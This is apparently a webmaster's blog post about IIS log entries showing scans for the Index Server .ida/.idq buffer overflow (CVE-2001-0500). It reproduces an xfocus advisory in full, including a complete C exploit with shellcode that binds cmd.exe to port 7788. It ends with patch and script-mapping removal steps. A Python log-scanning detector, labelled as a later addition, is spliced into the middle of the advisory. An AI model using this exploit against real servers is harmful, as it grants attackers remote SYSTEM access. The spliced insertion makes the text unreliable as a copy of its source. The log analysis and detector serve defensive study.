After studying IIS logs, I went to look at my site's log files and found garbled text in them; someone had obviously been scanning me.
The IPs used for the scanning also kept changing: Liaoning, Thailand, South Korea. Below is the garbled log file:
2008-10-13 02:30:06 59.46.32.130 - 10.4.0.122 80 GET /NULL.IDA
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%
u96d2%u77e5%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙悙?悙恄?悙愯?
[... remainder of the query string: raw shellcode bytes rendered as garbled multibyte characters, omitted ...]cmd.exe$ 404 -
The other side has been scanning for the IIS Index Server ISAPI extension remote overflow vulnerability.
A detailed description of the vulnerability, taken from http://www.xfocus.net/vuls/200106/1099.html:
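As an added example (not part of the original post or the advisory), a small Python checker for the pattern visible in the log above: an .ida/.idq request whose query carries a long run of filler characters and %u-encoded bytes. It assumes the default IIS W3C extended field names announced by the log's #Fields header; the sample lines are constructed, the first one modelled on the page's own entry.

```python
import re
from collections import Counter

# Constructed sample in IIS W3C extended format; the first entry follows the page's probe
# (filler trimmed to 230 bytes), the others are made up for contrast.
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-10-13 02:30:06 59.46.32.130 - 10.4.0.122 80 GET /NULL.IDA "
    + "C" * 230 + "%u0aeb%ub890%u96d2%u77e5=x 404",
    "2008-10-13 02:31:40 10.4.0.7 - 10.4.0.122 80 GET /index.html - 200",
    "2008-10-13 02:33:12 203.0.113.9 - 10.4.0.122 80 GET /default.ida "
    + "N" * 224 + "%u9090%u6858=a 404",
    "2008-10-13 02:35:01 10.4.0.7 - 10.4.0.122 80 GET /search.idq CiRestriction=test&CiScope=%2F 200",
])

IDA_EXT = re.compile(r"\.id[aq]$", re.IGNORECASE)   # idq.dll serves both extensions
UNICODE_ESC = re.compile(r"%u[0-9a-fA-F]{4}")         # %uXXXX escapes as in the page's log
LONG_RUN = re.compile(r"(.)\1{49,}")                  # 50+ identical filler bytes in a row
OVERFLOW_LEN = 240                                    # the advisory's ~240-byte threshold

def parse_w3c(text):
    """Yield one dict per entry, mapping the names from the #Fields directive to values."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(row):
    """Return why an .ida/.idq request looks like an overflow probe ([] if it looks benign)."""
    reasons = []
    if not IDA_EXT.search(row.get("cs-uri-stem", "")):
        return reasons
    query = row.get("cs-uri-query", "-")
    if len(query) >= OVERFLOW_LEN:
        reasons.append("query>=%d bytes" % OVERFLOW_LEN)
    if LONG_RUN.search(query):
        reasons.append("long run of one character")
    if UNICODE_ESC.search(query):
        reasons.append("%u-encoded payload")
    return reasons

def find_probes(text):
    """Return (findings, hits per source IP); the status shows whether the mapping answered."""
    findings = [(r["c-ip"], r["cs-uri-stem"], r["sc-status"], why)
                for r in parse_w3c(text) if (why := classify(r))]
    return findings, Counter(f[0] for f in findings)

if __name__ == "__main__":
    for ip, stem, status, why in find_probes(SAMPLE_LOG)[0]:
        print(ip, stem, status, "; ".join(why))
```

The third sample line is shorter than the 240-byte threshold but is still caught by the filler-run and %u checks, which is why the three signals are combined rather than relying on length alone.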
Published: 2001-06-20
Updated: 2001-06-20
Severity: High
Threat level: remote administrator privileges
Error type: input validation error
Exploitation: server mode
BUGTRAQ ID: 2880
CVE(CAN) ID: CVE-2001-0500
Affected systems
Microsoft IIS 4.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
Detailed description
<*IIS 4.0/5.0 Index Server and Indexing Service ISAPI Extension Buffer Overflow *>
<keyword: ISAPI Extension Buffer Overflow>
Microsoft Index Server speeds up searching of a web site and provides queries against administration scripts and Internet data. By default it supports the administration script type .ida and the query script type .idq, both of which are handled by idq.dll.
This extension contains a buffer overflow: because idq.dll performs no bounds checking on user-supplied input parameters, a remote attacker can use the overflow to gain SYSTEM privileges on the remote system.
Test code
The following request causes the EIP to be overwritten:
GET /NULL.ida?[buffer]=X HTTP/1.1
Host: werd
[buffer] is about 240 bytes.
isno (isno@xfocus.org) provided the following test program:
// Someone has already written this, but I think the most important thing about publishing
// an exploit program is to share the programming ideas, not just to hand out an attack tool,
// so I am releasing the source code as well.
// by isno<isno@xfocus.org>
#ifndef WIN32
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#else
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90
#define SP0_JMPEBX "%uac97%u77e4" // jmp ebx in WIN2k+SP0
#define SP1_JMPEBX "%ubf17%u77e4" // jmp ebx in WIN2k+SP1

unsigned char shellcode[]=
// shellcode: bind cmd.exe to port 7788
"\x90\x55\x8b\xec\x33\xc0\x40\xc1\xe0\x0b\x2b\xe0\xeb\x03\x90\xeb"
"\x05\xe8\xf9\xff\xff\xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
"\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
"\x68\x68\x68\x68";

unsigned char jump[]=
"%u08eb%u9090";
// jmp 0x08

unsigned char jump_to_shell[]=
"%u9090%uc033%ub866%u031f%u0340%u8bd8%u8b03"
"%u6840%udb33%u30b3%uc303%ue0ff";
// jmp dword ptr [[[ebx+0x320]+0x68]+0x30]

int main(int argc,char *argv[])
{
    int s,sp;
    char *p,shell_buf[4096],jmp_buf[4096],buf[4096];
    struct hostent *he;
    struct sockaddr_in sin;
#ifdef WIN32
    WSADATA WSAData;
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
#endif
    if(argc!=3)
    {
        printf("Usage: %s host sp\n",argv[0]);
        return -1;
    }
    sp=atoi(argv[2]);

    /* shell_buf: NOP sled with the shellcode copied in at offset 16, then NUL-terminated */
    memset(shell_buf,NOP,sizeof(shell_buf));
    memcpy(&shell_buf[16],shellcode,strlen((char *)shellcode));
    shell_buf[strlen((char *)shellcode)+16] = 0;

    /* jmp_buf: 232 bytes of filler, the short jmp, the "jmp ebx" address for the
       chosen service pack, and the stub that jumps on to the shellcode */
    memset(jmp_buf,1,sizeof(jmp_buf));
    p = &jmp_buf[232];
    sprintf(p,"%s",jump);
    p += strlen((char *)jump);
    if(sp==1)
    {
        sprintf(p,"%s",SP1_JMPEBX);
        p += strlen(SP1_JMPEBX);
    }
    else
    {
        sprintf(p,"%s",SP0_JMPEBX);
        p += strlen(SP0_JMPEBX);
    }
    sprintf(p,"%s",jump_to_shell);
    p += strlen((char *)jump_to_shell);
    *p = 0;   /* NUL-terminate jmp_buf so the %s below stops here */

    /* the overflow goes in the query string, the shellcode in a custom header */
    sprintf(buf,"GET /null.ida?%s=x HTTP/1.0\r\nShell: %s\r\n\r\n",jmp_buf,shell_buf);

    if((he = gethostbyname(argv[1])) == 0)
    {
        printf("Unable to resolve host %s\n",argv[1]);
        exit(1);
    }
    sin.sin_family = AF_INET;
    sin.sin_addr = *((struct in_addr *)he->h_addr);
    sin.sin_port = htons(80);
    if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("Unable to set up socket\n");
        exit(1);
    }
    if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1)
    {
        printf("Unable to connect\n");
        exit(1);
    }
    else
        printf("Connected...\n");
    if(send(s, buf, strlen(buf), 0) == -1)
    {
        printf("Unable to send\n");
        exit(1);
    }
    else
        printf("code sent...\n");
#ifdef WIN32
    Sleep(1000);
#else
    sleep(1);
#endif
    close(s);
    printf("Done.\n");
    return 0;
}
Solution
Note:
1. Systems that have Index Server or Indexing Service installed but do not have IIS installed are not affected.
2. Even if Index Server/Indexing Service is not running, an attacker can still exploit this vulnerability as long as the script mapping for .idq or .ida files exists.
1. Download and install the patch:
Windows NT 4.0:
MS download: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
Windows 2000 Professional, Server and Advanced Server:
MS download: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800
Windows XP beta:
Will be fixed in the next beta release.
2. Remove the script mappings for .idq and .ida.
Note: if other system components are added or removed, this mapping may be reinstalled automatically.